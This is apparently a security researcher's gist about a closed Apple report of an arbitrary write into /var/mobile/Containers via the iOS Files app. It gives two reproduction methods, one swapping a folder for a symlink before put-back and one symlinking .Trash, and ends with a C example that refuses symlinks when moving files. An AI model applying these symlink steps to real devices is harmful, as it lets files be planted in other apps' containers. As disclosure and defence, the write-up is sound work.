@khanhduytran0
Last active May 29, 2025 02:11
A closed report of arbitrary write to /var/mobile/Containers

Note

Due to the sandbox of the affected app, it is only possible to write to /var/mobile/Containers, and you cannot overwrite a file with this, hence Apple closed the report.

Timeline

March 11

@verygenericname told me he found an arbitrary write to /var/mobile/Containers, using the Files app, with the following steps:

  1. create a folder,
  2. put a file inside it,
  3. move the file to trash,
  4. replace the folder with a symlink anywhere in /var/mobile/Containers/,
  5. restore the file,
  6. congratulations

So let's say we have a directory structure like this:

Documents
├── .Trash
├── Folder
│   └── File.txt
└── Symlink -> /var/mobile/Containers

Open the Files app and delete File.txt. It is moved to the hidden .Trash folder, and the original path is recorded in an extended attribute, com.apple.trash.putback:

$ tree -a Documents
Documents
├── .Trash
│   └── File.txt
├── Folder
└── Symlink -> /var/mobile/Containers

3 directories, 1 file
$ xattr -l Documents/.Trash/File.txt 
com.apple.trash.putback#PS: bplist00?W/Folder

com.apple.trash.time#PS: bplist00?3A????

Now let's swap Folder with Symlink:

$ mv Documents/Folder Documents/Folder_
$ mv Documents/Symlink Documents/Folder
$ tree -a Documents
Documents
├── .Trash
│   └── File.txt
├── Folder -> /var/mobile/Containers
└── Folder_

Now go to the Files app, open Recently Deleted, and recover the previously deleted File.txt. You'll get an error: [image]

Now go back to the Documents directory. File.txt is nowhere to be seen, as it has been moved to the symlink destination!

$ tree -a Documents
Documents
├── .Trash
├── Folder -> /var/mobile/Containers
└── Folder_

3 directories, 0 files
$ ls -lah Documents/Folder/File.txt 
-rw-r--r-- 1 mobile mobile 0 May 29 07:26 Documents/Folder/File.txt

Sounds complicated, right? But I have found a simpler approach.

May 12

I found that if I just make .Trash a symlink, deleting a file will directly move it to the desired location.

Let's set up your app's Documents directory like this:

Documents
├── .Trash -> /var/mobile/Containers
└── File.txt

All you need to do is go to the Files app and delete File.txt, and you'll get a similar error: [image]

Now let's check the result:

$ tree -a Documents
Documents
└── .Trash -> /var/mobile/Containers

1 directory, 0 files
$ ls -lah Documents/.Trash/File.txt
-rw-r--r-- 1 mobile mobile 0 May 29 07:26 Documents/.Trash/File.txt

May 29

Apple closed our report, concluding it wasn't a security issue.
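
Both variants above depend on the trash code following a symlink while resolving `.Trash` or the recorded put-back folder. The following C example is added here and is not code from Apple or from the gist's author. It shows one way a file manager can resolve those directories component by component without following symlinks; `open_dir_beneath`, `move_within_root` and the `/tmp` layout are hypothetical names and constructed test data.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open directory `rel` beneath rootfd one component at a time, refusing
 * symlinks (O_NOFOLLOW) and "..", so the result cannot leave the root. */
static int open_dir_beneath(int rootfd, const char *rel) {
    char buf[1024], *save = NULL;
    if (snprintf(buf, sizeof buf, "%s", rel) >= (int)sizeof buf) return -1;
    int fd = dup(rootfd);
    for (char *c = strtok_r(buf, "/", &save); fd >= 0 && c;
         c = strtok_r(NULL, "/", &save)) {
        int next = strcmp(c, "..") == 0 ? -1
                 : openat(fd, c, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
        close(fd);
        fd = next;
    }
    return fd;
}

/* Hypothetical helper: move <root>/<src_dir>/<name> to <root>/<dst_dir>/<name>.
 * Serves both delete (dst_dir = ".Trash") and put-back (src_dir = ".Trash"). */
int move_within_root(const char *root, const char *src_dir,
                     const char *dst_dir, const char *name) {
    if (!*name || strchr(name, '/') || strcmp(name, "..") == 0) return -1;
    int rootfd = open(root, O_RDONLY | O_DIRECTORY);
    if (rootfd < 0) return -1;
    int src = open_dir_beneath(rootfd, src_dir);
    int dst = open_dir_beneath(rootfd, dst_dir);
    /* renameat uses the directory handles opened above; no path is re-resolved. */
    int rc = (src >= 0 && dst >= 0) ? renameat(src, name, dst, name) : -1;
    if (src >= 0) close(src);
    if (dst >= 0) close(dst);
    close(rootfd);
    return rc;
}

int main(void) {   /* constructed layout: Folder has been swapped for a symlink */
    char root[] = "/tmp/putbackXXXXXX";
    if (!mkdtemp(root) || chdir(root) || mkdir(".Trash", 0700)) return 1;
    close(open(".Trash/File.txt", O_CREAT | O_WRONLY, 0600));
    if (symlink("/tmp", "Folder")) return 1;
    printf("put-back: %d\n", move_within_root(".", ".Trash", "Folder", "File.txt"));
    return 0;
}
```

With the symlinked `Folder`, the put-back fails and `File.txt` stays in `.Trash`. The same refusal applies when `.Trash` itself is the symlink.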
